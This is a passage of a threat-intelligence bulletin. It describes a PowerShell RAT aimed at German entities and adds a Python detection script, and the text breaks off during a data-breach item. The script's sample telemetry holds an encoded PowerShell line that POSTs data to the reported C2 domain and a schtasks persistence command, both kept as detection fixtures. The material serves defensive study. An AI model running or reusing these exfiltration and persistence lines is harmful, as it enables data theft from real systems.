Ankura CTIX FLASH Update - May 17, 2022

Published date: 20 June 2022
Subject Matter: Privacy, Technology, Data Protection, Security
Law Firm: Ankura Consulting Group LLC
Author: Ankura Consulting Group LLC

Ransomware/Malware Activity

German Entities Targeted with PowerShell RAT

Threat actors are actively targeting German entities with custom PowerShell payloads to gather information about the ongoing conflict between Russia and Ukraine. The malicious remote access trojan (RAT) is masked as a downloadable reporting document on a clone site mimicking the official Baden-Württemberg website. Once the document is downloaded, the user is met with a fake error message stating that the application encountered an error, while in the background a Base64-encoded PowerShell command executes, reaches out to actor-controlled nodes of the fake website, and downloads the associated payloads. Once that completes, the files "MonitorHealth.cmd" and "Status.txt" are dropped onto the compromised system. A scheduled task set by the payload executes "MonitorHealth.cmd" at a specific time each day to maintain persistence on the system. "Status.txt" is a PowerShell RAT that collects device information such as the current username, active working directory, and device hostname, all paired with a unique user identifier. This information is serialized as JSON and sent to threat actor endpoints via HTTP POST requests. Built-in features allow the RAT to probe the anti-virus and security measures in its current environment and to evade the Windows Antimalware Scan Interface (AMSI) with a bypass function script. Indicators reveal that one of the command-and-control nodes to which the POST data is exfiltrated is "kleinm[.]de". Current indicators do not tie any one actor to this PowerShell RAT; however, CTIX analysts continue to monitor chatter about this activity and will provide updates accordingly.

  • Malwarebytes: PowerShell RAT
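As an added illustration of how a defender might look for the behaviours described above (this is example code, not Ankura's or Malwarebytes' own tooling), the following Python runs a few detection rules over constructed, Sysmon-style process, file and network events. It decodes a Base64-encoded PowerShell command line and inspects it for the reported C2 domain, flags the dropped files MonitorHealth.cmd and Status.txt and a scheduled task that points at them, and flags connections to kleinm[.]de. The field names follow Sysmon's, the sample events are constructed, and the set of abbreviated -EncodedCommand switches the regex accepts is an assumption about how the encoded command was launched, since the report does not quote the command line.

```python
import base64
import re

# Observables taken from the report (the domain is written defanged there as kleinm[.]de).
C2_DOMAINS = {"kleinm.de"}
DROPPED_FILES = {"monitorhealth.cmd", "status.txt"}

# powershell.exe accepts -e / -ec / -enc / -encodedcommand followed by Base64 of a
# UTF-16LE script; which abbreviation the campaign used is not stated, so accept all.
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(events):
    """Apply the rules to Sysmon-style event dicts; return (event index, rule, detail) tuples."""
    findings = []
    for i, ev in enumerate(events):
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        text = (cmd + " " + ev.get("TargetFilename", "")).lower()

        # Rule 1: encoded PowerShell, then look inside the decoded script for the C2 domain.
        if image.endswith("powershell.exe"):
            script = decode_encoded_command(cmd)
            if script is not None:
                findings.append((i, "encoded_powershell", script))
                hits = [d for d in C2_DOMAINS if d in script.lower()]
                if hits:
                    findings.append((i, "c2_in_decoded_script", hits[0]))

        # Rule 2: the named dropped files, with schtasks /create treated as the persistence step.
        dropped = [f for f in DROPPED_FILES if f in text]
        if dropped:
            if image.endswith("schtasks.exe") and "/create" in cmd.lower():
                rule = "scheduled_task_persistence"
            else:
                rule = "known_dropped_file"
            findings.append((i, rule, dropped[0]))

        # Rule 3: network connection (Sysmon event 3) to the reported C2 node.
        host = ev.get("DestinationHostname", "").lower()
        if host in C2_DOMAINS:
            findings.append((i, "c2_connection", host))
    return findings


# Constructed sample telemetry modelled on the behaviour described in the report:
# an encoded PowerShell launch whose payload POSTs to the C2, the dropped file,
# the daily scheduled task, a connection to the C2, and one benign control event.
SAMPLE_SCRIPT = "$u = 'http://kleinm.de/'; Invoke-RestMethod -Method Post -Uri $u -Body $json"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Public\Status.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc daily /st 09:00 /tn Health /tr "C:\Users\Public\MonitorHealth.cmd"'},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "kleinm.de", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for idx, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Decoding the encoded command rather than alerting on its mere presence is the part that matters in practice: encoded PowerShell is common in legitimate administration, but an encoded script that names a known C2 host, or that writes the reported file names, is a much higher-confidence signal, and the decoded text is what an analyst will want attached to the alert.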

Threat Actor Activity

Motion and Control Technologies Corporation Discloses Data Breach Impacting Employees, Dependents, and More

Parker-Hannifin, a corporation based in Ohio that specializes in motion and control technologies, recently disclosed a data breach that exposed the personal information of employees. According to Parker, an unauthorized third party had access to the corporation's IT systems between March 11 and March 14 and "may have acquired certain files" containing data pertaining to "current and former employees, their dependents, and members of Parker's Group Health Plans (including health plans sponsored by an entity acquired by Parker)." The data included names, Social Security numbers (SSNs), dates of birth, addresses...
